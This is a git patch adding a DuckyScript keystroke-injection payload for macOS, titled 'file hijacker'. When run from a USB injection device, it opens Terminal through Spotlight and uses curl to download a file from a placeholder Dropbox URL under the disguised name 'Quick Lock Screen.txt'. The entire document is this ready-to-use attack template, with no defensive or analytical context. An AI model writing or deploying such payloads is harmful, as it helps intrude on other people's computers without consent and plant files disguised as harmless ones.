From 40b338e1471c26856b9273272918dabe569a8e08 Mon Sep 17 00:00:00 2001 From: Narsty Date: Sat, 13 May 2023 01:23:24 -0500 Subject: [PATCH] Add files via upload --- Executions/File hijacker.txt | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 Executions/File hijacker.txt diff --git a/Executions/File hijacker.txt b/Executions/File hijacker.txt new file mode 100644 index 0000000..bc88703 --- /dev/null +++ b/Executions/File hijacker.txt @@ -0,0 +1,20 @@ + +REM Author: Narsty +REM Title: file hijacker +REM Version 1.0 MacOs + +REM Replace with the actual URL for the file you want to download. +REM Additionally, replace file.ext with the desired name and extension for the downloaded file. + + +DELAY 2000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 2000 +STRING curl -o "Quick Lock Screen.txt" "Enter dropbox File URL here" +ENTER + +